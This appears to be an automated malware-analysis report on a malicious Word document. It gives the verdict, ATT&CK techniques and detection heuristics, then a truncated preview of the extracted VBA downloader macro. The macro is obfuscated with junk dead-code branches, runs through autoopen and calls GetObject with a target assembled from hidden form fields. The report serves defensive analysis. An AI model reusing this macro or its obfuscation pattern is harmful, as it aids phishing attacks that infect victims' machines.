Verdict: MALICIOUS (Risk Score: 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine and the 'GetObject' call within the VBA p-code indicate an attempt to execute code upon opening. The presence of the 'Doc.Downloader' ClamAV signature strongly suggests the macro's purpose is to download and execute a secondary payload, aligning with the 'Spearphishing Attachment' initial access technique.
Heuristics (7)

- ClamAV: Doc.Downloader.00536d-6931472-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6931472-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27885 bytes |

SHA-256: f561bcfe455869839ccc04cd3f8175b78788af7a776c67812b2d9be8e1742f9a
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "YQAQAAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jAwBUUw"
Attribute VB_Base = "0{B12F6CD3-1BA0-483A-889A-52D95D66E372}{19E70670-5AC4-4964-A14B-D1E4884439F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "uADAUo"
Attribute VB_Base = "0{19AF7467-1988-4E19-958C-7E68DBD3E749}{962C1FD2-9142-43B5-875A-54C8F31868DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UkAkBC"
Function mDQGXA()
If 926485745 = 104447378 Then
For bGGDAD = oUAC4G1G To F_QwAUw
DAZQAA _
= 45914879 / Rnd(VAQxBc) + 906288282 * _
CStr(kADDwA) * 354956876 - Oct(999726634 * _
Fix(583496893) / 527800086 + Int(wkkAx4)) _
- iZBBAAAA + 78461666 - 908481086 + 805474922 - (kQkDckAA - 153169644)
Next
End If
If 523693969 = 187519467 Then
For NQBAAxQ = zXAGCA1A To M_AAUA
YAcQ4A _
= 274495506 / Rnd(iAAAAxBc) + 945797859 * _
CStr(PBZ_xX) * 757829632 - Oct(906106008 * _
Fix(991047477) / 501170525 + Int(KAAAQ_B)) _
- LZUABAA + 456781937 - 424309911 + 58067212 - (iA4AZZA - 382119161)
Next
End If
End Function
Sub autoopen()
v1oBAUDA
End Sub
Function v1oBAUDA()
On Error Resume Next
If 427055496 = 105884492 Then
For ZBAUAAww = uAAAkkA To wBA_QwX
OAADXUQk _
= 407987784 / Rnd(ZBADQAU) + 409152108 * _
CStr(jUc_UD) * 849782936 - Oct(91938495 * _
Fix(261903404) / 184014953 + Int(UCX4QA)) _
- zAAAADB1 + 923820457 - 615395877 + 505713965 - (bAACo_ - 619968095)
Next
End If
If 911574512 = 133808744 Then
For NUXX_k = VcA4DA4c To B4wA4k
MQQoBAAQ _
= 258119796 / Rnd(jQcXkAUD) + 667193569 * _
CStr(RxAAkU) * 890312154 - Oct(608281020 * _
Fix(765110002) / 81685840 + Int(tDkQkAQ)) _
- jDAUAUk + 600922462 - 225555819 + 747148761 - (H_QAkA - 426980300)
Next
End If
If 919065425 = 165568405 Then
For MXBAwA = pQBAwU To hAwACD
I4cCAG _
= 98719729 / Rnd(ZBAUDZ) + 527400093 * _
CStr(CAADUoUB) * 418284322 - Oct(183612167 * _
Fix(944353607) / 974110703 + Int(bZA4BBDk)) _
- sAAcA1 + 237702986 - 693814704 + 882813531 - (jADADQ - 312099124)
Next
End If
Set CDAAAAB = GetObject(jAwBUUw.bA4CoCAA.Text + uADAUo.cAQB1CcU + jAwBUUw.bA4CoCAA)
If 655797196 = 986016277 Then
For XUAAABA = X1QxXA To NCxABAo
fQkDAAU _
= 35732998 / Rnd(m_Zk_oA) + 563370473 * _
CStr(pXCGDU) * 22701266 - Oct(410623260 * _
Fix(935811902) / 895297027 + Int(hBwAwwQ)) _
- zQcACA + 826228280 - 557865643 + 786321699 - (UDQA4AxA - 880592925)
Next
End If
If 412059254 = 327365896 Then
For jQ4A_U = nAxBUDXB To VQ1ocZ
u_DAAXxA _
= 135620214 / Rnd(jDBGcUGx) + 157153637 * _
CStr(SAAkABA) * 803087115 - Oct(527022232 * _
Fix(91292782) / 610840131 + Int(IDAQBBw)) _
- w4CBo1ZA + 472893451 - 292187756 + 37969134 - (dcxAAk - 332533099)
Next
End If
If 602194870 = 684119939 Then
For zQUAokAA = jACBkA To OBcA1UUA
jACAxCB _
= 36061538 / Rnd(zQADAoAU) + 786759115 * _
CStr(BoQU1CA) * 512123459 - Oct(703706042 * _
Fix(859166347) / 569842305 + Int(JA1AAxc)) _
- HoZDAcU + 57260061 - 986484904 + 529082513 - (f_AUAc - 802228813)
Next
End If
If 514514 = 514514 Then
If 762694263 = 243565106 Then
For qAk4ZZB = QxDDAAA To Fx4AXoG
fcxQAcoo _
= 670002756 / Rnd(KAAQkBoB) + 396399619 * _
CStr(BBkkAo) * 773049858 - Oct(567718994 * _
Fix(226972373) / 924991597 + Int(MC4QDD_X)) _
- jAXoACA + 29113698 - 831793367 + 972764645 - (zXAQAxD - 102283763)
Next
End If
If
... (truncated)